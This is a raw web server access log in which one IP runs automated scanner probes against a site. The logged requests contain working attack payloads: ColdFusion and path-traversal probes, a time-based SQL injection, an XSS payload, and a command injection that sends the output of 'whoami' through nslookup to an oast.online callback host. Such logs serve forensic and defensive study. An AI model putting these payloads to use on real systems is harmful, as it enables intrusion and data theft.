[24/Apr/2025:09:41:25 -0400] "POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:41:47 -0400] "GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0" 154.84.62.234 - - [24/Apr/2025:09:42:53 -0400] "GET /session/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:43:06 -0400] "POST /atutor/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 154.84.62.234 - - [24/Apr/2025:09:43:11 -0400] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:43:53 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:44:23 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:09:45:32 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:45:38 -0400] "GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:45:46 -0400] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:45:46 -0400] "GET /wp-admin/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:09:45:53 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:09:46:01 -0400] "POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:09:46:07 -0400] "POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.24" 154.84.62.234 - - [24/Apr/2025:09:46:13 -0400] "GET /spip.php?page=spip_pass HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:46:14 -0400] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.23" 154.84.62.234 - - [24/Apr/2025:09:46:26 -0400] "GET /api/v1/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:01 -0400] "POST /api/add-article-by-text HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:09:47:01 -0400] "POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.23" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.20" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/127.0.2 (x64 de)" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/618.6 (KHTML, like Gecko) Version/17.2 Safari/618.6" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.17" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:26 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.21 (KHTML, like Gecko) Version/17.0 Safari/616.21" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:09:47:27 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.7.18" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.46" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/4 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:33 -0400] "GET /api/v1/database/1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/6 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/10 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/5 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:47:34 -0400] "GET /api/v1/database/9 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:48:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.22" 154.84.62.234 - - [24/Apr/2025:09:48:29 -0400] "GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:48:37 -0400] "GET /api/hassio/app/.%09./supervisor/info HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:48:45 -0400] "GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:50:35 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:09:51:02 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:51:10 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:09:51:15 -0400] "POST /index.php/management/set_timezone HTTP/1.1" 200 0 "https://mgrokokbet.id/index.php/management/datetime" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.19" 154.84.62.234 - - [24/Apr/2025:09:51:20 -0400] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:51:27 -0400] "GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:52:04 -0400] "GET /users/sign_in HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:54:44 -0400] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:54:52 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:55:01 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:09:55:10 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1 20.51" 154.84.62.234 - - [24/Apr/2025:09:55:18 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:55:27 -0400] "POST /app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:09:55:28 -0400] "POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:09:55:35 -0400] "GET /app?service=page/PrinterList HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 154.84.62.234 - - [24/Apr/2025:09:56:00 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:56:58 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:09:57:13 -0400] "GET /_api/web/siteusers HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:09:57:20 -0400] "GET /_api/web/siteusers HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:09:57:23 -0400] "POST /texteditor.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0" 154.84.62.234 - - [24/Apr/2025:09:57:38 -0400] "POST /user/save HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/118.0" 154.84.62.234 - - [24/Apr/2025:09:57:58 -0400] "POST /job/list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:00:11 -0400] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:00:18 -0400] "POST /v1/warehouse/pending-events HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:10:00:19 -0400] "GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:00:21 -0400] "GET /2w9rfZrrtWUPdRqwHPpqJXmA69W HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:01:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.7.21" 154.84.62.234 - - [24/Apr/2025:10:01:10 -0400] "GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:01:20 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:02:00 -0400] "GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://d04qr7ij4pq19d75k4907azapj8gom3s4.oast.online/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:03:01 -0400] "GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).d04qr7ij4pq19d75k490ptjhw6ysg71ob.oast.online%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22mgrokokbet.id%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:03:37 -0400] "POST /api/router/mesh/status HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" 154.84.62.234 - - [24/Apr/2025:10:04:12 -0400] "GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.25" 154.84.62.234 - - [24/Apr/2025:10:04:19 -0400] "GET /login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:04:42 -0400] "POST /api/remotefollow HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:10:05:30 -0400] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:10:06:25 -0400] "POST /Servlet/Skins HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:06:33 -0400] "GET /2w9rffHGjrMorp83GZb0RQR7yfr.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:06:37 -0400] "POST /admin/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:10:06:42 -0400] "GET /admin/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:07:04 -0400] "POST /ajax.php?action=save_user HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:07:15 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:07:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:10:07:20 -0400] "POST /main/webservices/additional_webservices.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" 154.84.62.234 - - [24/Apr/2025:10:07:22 -0400] "POST /goform/aspForm HTTP/1.1" 200 0 "-" 